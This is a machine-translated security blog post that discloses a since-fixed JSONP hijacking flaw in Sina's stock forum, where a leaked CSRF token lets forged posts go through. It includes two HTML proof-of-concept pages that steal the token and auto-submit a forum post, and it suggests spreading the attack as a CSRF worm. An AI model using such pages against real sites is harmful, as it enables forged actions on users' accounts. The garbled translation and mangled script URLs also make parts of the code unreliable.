Home > Developer > Web Develop
Recently the JSONP is very fire, the truth said already was the play rotten, just has not received everybody's attention. Just last month, I dug a community csrf, which was created by JSONP, for the purpose of preparing an article, and then this article will be shared.
Because Sina has fixed the problem, so I first to share this loophole. Here are some of the articles that were written at the time.
0x01 Intro
I heard Sina May to send clothes, I actually do not have too much space to dig holes. Originally wanted to hand over a two years ago dug csrf brush powder, the results took out a look at the hole early, the target station are changed.
In detail, that is my hole was 302 jump to Sina stock Bar (http://guba.sina.com.cn/) went.
The stock market is very hot recently, how many people are rich in the stock market. So I simply opened the burpsuite in the stock bar to turn a circle, found an interesting csrf.
Sina Weibo play many students know Sina against CSRF loophole defense strategy is to check referer, but stock bar posting here is not, rare check is token.
, grab a post with a normal post packet, and we can see that this field contains _csrf_token. After simple fuzz discovery, this request is not checked referer, as long as _csrf_token correct can post.
So, how to get _csrf_token, I have the following ideas:
Why do I have these ideas? First, the acquisition token must be a cross-domain process, cross-domain is usually cors, PostMessage and Jsonp, where cors and postmessage are not there, then I went to find JSONP.
Flash ideas should have been circulating for a long time, this time last year/fd already in drops said this: http://drops.wooyun.org/tips/2031
But Law 2 has a very important condition is that we need to find a control output content points, such as uploading, JSONP, etc., but in fact, such a location is not easy to use, not as simple as the first method.
0x02 Jsonp betrayed your _csrf_token.
Then, follow your own ideas to test.
I first change the _csrf_token to a random string, send the discovery to return such a result:
The returned packet is a JSON-formatted string that contains a _csrf_token. Sending this packet multiple times, I found the token to change every time.
Then I can probably guess, the stock bar token is a dynamic generation, should be stored in the session, each time the check is completed will generate a new.
But this is the return value in JSON format, not JSONP.
So I'm trying to add "&callback=hehehe" to the Get parameter:
It is clear that the returned format has changed. Although not JSONP, but it is a <script>.
Why did you add callback=hehehe to the change? This should be a development habit, usually the development of the design API will have JSON and JSONP two formats, and usually take JSONP function name of the variable name is callback.
This is <script> can't cross the domain Yes, Parent.hehehe executes the hehehe function in the parent frame, but the parent frame (10.211.55.3) and guba.sina.com.cn are different domains, and this error will be found under chrome:
To continue, change the HTTP method to get:
Surprise, the method of a change to get JSONP.
So I'll use this jsonp _csrf_token to try to successfully post:
The tragedy is, no ...
Then I have two guesses.
The first conjecture was negated by my programmer's intuition, and I've never seen a program like this.
I tried a second guess, adding &bid=9947 to the URL of the get packet and sending the packet again:
Still in the JSONP format, I send this token again to the post packet:
It worked!
A JSONP will _csrf_token outright betray.
0X03 Structure POC post any posts
So I began to write the POC to complete the steps just completed manually. Ideas are as follows:
First construct a simple code to get tokens:
Default| 12345678910111213 | <html> <head> <title>Test</title> <meta charset="Utf-8"> <script Type="Text/javascript"> function hehehe(obj){ console. Log(obj); alert(obj["result"]["Data"]["_csrf_token"]); }</script><script Type="text/javascript" src= "https://static-js.b0.upaiyun.com/ Wp-content/uploads/auto_save_image/2015/07/135322yju.jpg "></script> </head> </HTML> |
Effect
Already got the token.
In this case, submit the token embedded in the form:
Default| 12345678910111213141516171819202122232425 | <html> <head> <title>Test</title> <meta charset="Utf-8"> </head> <body> <form action="Http://guba.sina.com.cn/api/?s=Thread&a=safe_post" method ="POST" id="Csrfsend"> <input type="hidden" name="Bid" value="9947"> <input type="hidden" name="tid" value="" > <input type="hidden" name="Content" value="This is the test result" > <input type="hidden" name= "title" value=" This is the test title "> <input type=< Span class= "crayon-s" > "hidden" id= "token" name=" _csrf_token " value=" "> <input type="hidden" name="Anonymous" value="1" > </form> <script Type="Text/javascript"> function hehehe(obj){ console. Log(obj); var csrf_token = obj [ "result" ][< Span class= "crayon-s" > "data" ][ _csrf_ Token "] document. getElementById("token"). Value = csrf_token; document. getElementById("Csrfsend"). Submit(); }</script><script Type="text/javascript" src="https://static-js.b0.upaiyun.com/ Wp-content/uploads/auto_save_image/2015/07/135322yju.jpg "></script> </body> </HTML> |
The above code, save as sinacsrf.html, any user access can be triggered, in section 9947 to publish a new post:
Visible Published:
This is a typical csrf vulnerability that JSONP stealing tokens to bypass the backend checks.
Posted in the post can also be pasted into the link, luring other users to click, click to visit the post again, resulting in a csrf worm.
Share a JSONP hijacking caused by a community csrf worm in Sina
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
